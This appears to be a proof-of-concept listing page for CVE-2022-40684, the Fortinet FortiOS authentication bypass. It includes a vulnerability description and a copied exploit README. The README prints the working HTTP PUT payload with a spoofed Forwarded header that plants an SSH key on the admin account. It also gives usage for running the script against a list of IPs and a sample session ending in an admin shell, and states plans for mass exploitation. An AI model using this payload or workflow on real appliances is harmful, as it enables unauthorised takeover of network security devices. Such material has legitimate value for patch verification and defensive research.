关联漏洞
            
                
                    标题:
                    Fortinet FortiOS 授权问题漏洞
                        (CVE-2022-40684)
                    
                    描述:Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS存在授权问题漏洞。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。
                
        
 
        
        
            介绍
            # CVE-2022-40684 by 1vere$k
For now it's a POC copy for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager appliances.  
Coppied from https://github.com/horizon3ai/CVE-2022-40684
## Analysis
The exploit uses the simple payload:  
```
		PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Report Runner
        Content-Type: application/json
        Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
        Content-Length: 610
        {
        "ssh-public-key1": "fake-key"
        }
```
## Summary
This POC abuses the authentication bypass vulnerability to set an SSH key for the specified user.
## Future Plans
Develop it for a full scale exploit with multi-targets and multi-servers for mass exploit.
## CLI Usage
```
1. chmod +x cve-2022-40684.sh
2. ./cve-2022-40684 <TARGET_IP>
 or
2. ./cve-2022-40684 <FILE_NAME>
```
Example:  
`./cve-2022-40684.sh ips.txt`
## PyUsage
`python3 CVE-2022-40684.py -t <TARGET_IP> --username admin --key-file ~/.ssh/id_rsa.pub`  
The example:  
```
root@kali:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
root@kali:~# ssh admin@10.0.40.67
fortios_7_2_1 # 
config      Configure object.
get         Get dynamic and system information.
show        Show configuration.
diagnose    Diagnose facility.
execute     Execute static commands.
alias       Execute alias commands.
exit        Exit the CLI.
```
        
        文件快照
        
            
                
 [4.0K]  /data/pocs/2b9c82797e14792c87a441bdd00db609e1187110
├── [2.0K]  cve-2022-40684.py
├── [ 270]  ip-pack.sh
└── [1.5K]  README.md
0 directories, 3 files
                
             
         
        备注
        
            
                1. 建议优先通过来源进行访问。
                2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
                3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。